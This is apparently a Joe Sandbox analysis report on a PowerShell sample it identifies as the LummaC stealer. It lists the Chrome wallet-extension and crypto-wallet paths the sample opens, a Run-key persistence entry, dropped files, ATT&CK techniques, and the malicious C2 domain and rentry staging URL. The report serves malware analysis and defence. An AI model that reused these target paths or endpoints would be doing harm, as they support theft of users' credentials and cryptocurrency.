Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior

Source: Yara match	File source: 00000008.00000003.2056776253.00000000032FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.2136313651.00000000032A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.2136183716.0000000003306000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Windows Management Instrumentation	11 DLL Side-Loading	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 Registry Run Keys / Startup Folder	11 DLL Side-Loading	1 Abuse Elevation Control Mechanism	LSASS Memory	14 File and Directory Discovery	Remote Desktop Protocol	21 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	211 Process Injection	4 Obfuscated Files or Information	Security Account Manager	134 System Information Discovery	SMB/Windows Admin Shares	1 Screen Capture	21 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 Registry Run Keys / Startup Folder	11 Software Packing	NTDS	331 Security Software Discovery	Distributed Component Object Model	2 Clipboard Data	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	1 Process Discovery	SSH	Keylogging	115 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 DLL Side-Loading	Cached Domain Credentials	121 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	121 Virtualization/Sandbox Evasion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	211 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
gkzHdqfg.ps1	0%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\exdefo	51%	ReversingLabs	Win32.Trojan.MintZard
C:\Users\user\AppData\Roaming\QHUPRmIp\AbRoot.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\QHUPRmIp\AdTree.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\QHUPRmIp\QtCore4.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\QHUPRmIp\QtGui4.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\QHUPRmIp\QtNetwork4.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\QHUPRmIp\QtXml4.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	4%	ReversingLabs
C:\Users\user\AppData\Roaming\QHUPRmIp\StarBurn.dll	3%	ReversingLabs
C:\Users\user\AppData\Roaming\QHUPRmIp\msvcp100.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\QHUPRmIp\msvcr100.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\QHUPRmIp\opengl64.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\QHUPRmIp\updater\nvdisps.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\QHUPRmIp\updater\nvdispsr.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\QHUPRmIp\updater\nvptxJitCompiler32.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\QHUPRmIp\x64\trading_api64.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\QHUPRmIp\x64\tradingnetworkingsockets.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-core-processthreads-l1-1-1.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-core-profile-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-core-rtlsupport-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-core-string-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-core-synch-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-core-synch-l1-2-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-core-sysinfo-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-core-timezone-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-core-util-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-crt-conio-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-crt-convert-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-crt-environment-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-crt-filesystem-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-crt-heap-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-crt-locale-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-crt-math-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-crt-multibyte-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-crt-private-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-crt-process-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\fmitor\QtCore4.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\fmitor\QtGui4.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\fmitor\QtNetwork4.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\fmitor\QtXml4.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\fmitor\StarBurn.dll	3%	ReversingLabs
C:\Users\user\AppData\Roaming\fmitor\msvcp100.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\fmitor\msvcr100.dll	0%	ReversingLabs

Source	Detection	Scanner	Label	Link
https://candidatersz.cyou/api	0%	Avira URL Cloud	safe
candidatersz.cyou	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
rentry.co	172.67.75.40	true	false		high
candidatersz.cyou	104.21.56.6	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://rentry.co/feouewe5/raw	false		high
https://candidatersz.cyou/api	true	Avira URL Cloud: safe	unknown
p10tgrace.sbs	false		high
p3ar11fter.sbs	false		high
peepburry828.sbs	false		high
candidatersz.cyou	true	Avira URL Cloud: safe	unknown
processhol.sbs	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	powershell.exe, 00000000.00000002.1929469102.0000021602115000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216007B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600859000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600B8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216021B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216020A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600BD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216025D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600CAA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021602210000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216025BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216009F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600C18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216022AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160215B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600B5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600C2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160208A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600AFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160299B000.00000004.00000800.00020000.00000000.sdmp	false	high
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 00000000.00000002.1929469102.0000021600225000.00000004.00000800.00020000.00000000.sdmp	false	high
https://sectigo.com/CPS0	powershell.exe, 00000000.00000002.1929469102.0000021602115000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216007B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600859000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600B8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216021B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216020A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600BD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216025D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600CAA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021602210000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216025BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216009F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600C18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216022AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160215B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600B5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600C2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160208A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600AFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160299B000.00000004.00000800.00020000.00000000.sdmp	false	high
http://crl.thawte.com/ThawteTimestampingCA.crl0	powershell.exe, 00000000.00000002.1929469102.0000021601CC4000.00000004.00000800.00020000.00000000.sdmp	false	high
http://ocsp.sectigo.com0	powershell.exe, 00000000.00000002.1929469102.0000021602115000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216007B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600859000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600B8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216021B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216020A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600BD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216025D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600CAA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021602210000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216025BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216009F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600C18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216022AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160215B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600B5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600C2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160208A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600AFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160299B000.00000004.00000800.00020000.00000000.sdmp	false	high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000000.00000002.1929469102.0000021600225000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000000.00000002.1929469102.0000021600225000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000000.00000002.1929469102.0000021600225000.00000004.00000800.00020000.00000000.sdmp	false	high
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	powershell.exe, 00000000.00000002.1929469102.0000021602115000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216007B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600859000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600B8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216021B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216020A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600BD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216025D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600CAA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021602210000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216025BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216009F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600C18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216022AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160215B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600B5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600C2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160208A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600AFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160299B000.00000004.00000800.00020000.00000000.sdmp	false	high
http://ocsp.thawte.com0	powershell.exe, 00000000.00000002.1929469102.0000021601CC4000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000000.00000002.1929469102.0000021600225000.00000004.00000800.00020000.00000000.sdmp	false	high
https://aka.ms/pscore68	powershell.exe, 00000000.00000002.1929469102.0000021600001000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000000.00000002.1929469102.0000021600001000.00000004.00000800.00020000.00000000.sdmp	false	high
https://github.com/Pester/Pester	powershell.exe, 00000000.00000002.1929469102.0000021600225000.00000004.00000800.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.56.6	candidatersz.cyou	United States		13335	CLOUDFLARENETUS	true
172.67.75.40	rentry.co	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1561012
Start date and time:	2024-11-22 16:34:12 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 13s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	gkzHdqfg.ps1
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winPS1@14/60@2/2
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Successful, ratio: 93% Number of executed functions: 28 Number of non-executed functions: 300
Cookbook Comments:	Found application associated with file extension: .ps1

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target Set-up.exe, PID 3684 because there are no executed function
Execution Graph export aborted for target Set-up.exe, PID 5700 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: gkzHdqfg.ps1

Simulations

Behavior and APIs

Time	Type	Description
10:35:18	API Interceptor	39x Sleep call for process: powershell.exe modified
10:35:28	API Interceptor	1x Sleep call for process: Set-up.exe modified
10:35:38	API Interceptor	8x Sleep call for process: msiexec.exe modified
15:35:26	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run NetUtilityApp C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe
15:35:34	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run NetUtilityApp C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.56.6	https://api.elasticemail.com/page?lid=Jkgo-Idg1Z-0EKoj0iThhg2	Get hash	malicious	Unknown	Browse
	https://api.elasticemail.com/page?lid=Jkgo-Idg1Z-0EKoj0iThhg2	Get hash	malicious	Unknown	Browse
	https://eTransaction@6412c866.5c79da8e904785696236898f.workers.dev/?qrc=test@test.com	Get hash	malicious	HTMLPhisher	Browse
172.67.75.40	zkGOUJOnmc.elf	Get hash	malicious	Unknown	Browse	arc-gym.com.cutestat.com/wp-login.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
rentry.co	xaSPJNbl.ps1	Get hash	malicious	LummaC	Browse	172.67.75.40
	Exploit Detector.bat	Get hash	malicious	Unknown	Browse	172.67.75.40
	MilwaukeeRivers.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.75.40
	http://www.thearchiterra.gr/	Get hash	malicious	Unknown	Browse	104.26.2.16
	RobCheat.exe	Get hash	malicious	Python Stealer, CStealer	Browse	172.67.75.40
	Spedizione.vbs	Get hash	malicious	Unknown	Browse	172.67.75.40
	sims-4-updater-v1.3.4.exe	Get hash	malicious	Unknown	Browse	172.67.75.40
	SecuriteInfo.com.Python.Stealer.1545.20368.28754.exe	Get hash	malicious	Python Stealer, CStealer	Browse	104.26.2.16
	grA6aqodO5.exe	Get hash	malicious	Python Stealer, CStealer	Browse	104.26.3.16
	SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe	Get hash	malicious	XWorm	Browse	104.26.3.16

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	http://mike@mikestavlund.com	Get hash	malicious	Unknown	Browse	104.19.230.21
	file.exe	Get hash	malicious	LummaC	Browse	172.67.155.248
	file.exe	Get hash	malicious	LummaC	Browse	172.67.155.248
	Payment CCF20240531_0002.html	Get hash	malicious	Unknown	Browse	104.16.123.96
	View_alert_details IJPI.html	Get hash	malicious	Unknown	Browse	172.66.0.102
	bootstraper.exe	Get hash	malicious	Unknown	Browse	104.20.23.46
	file.exe	Get hash	malicious	LummaC, Amadey, CredGrabber, Credential Flusher, Cryptbot, LummaC Stealer, Meduza Stealer	Browse	172.67.74.152
	Purchase Order PO.exe	Get hash	malicious	FormBook	Browse	104.21.58.90
	bootstraper.exe	Get hash	malicious	Unknown	Browse	104.20.23.46
	https://app.typeset.com/play/G4WZ1	Get hash	malicious	HTMLPhisher	Browse	104.22.8.215
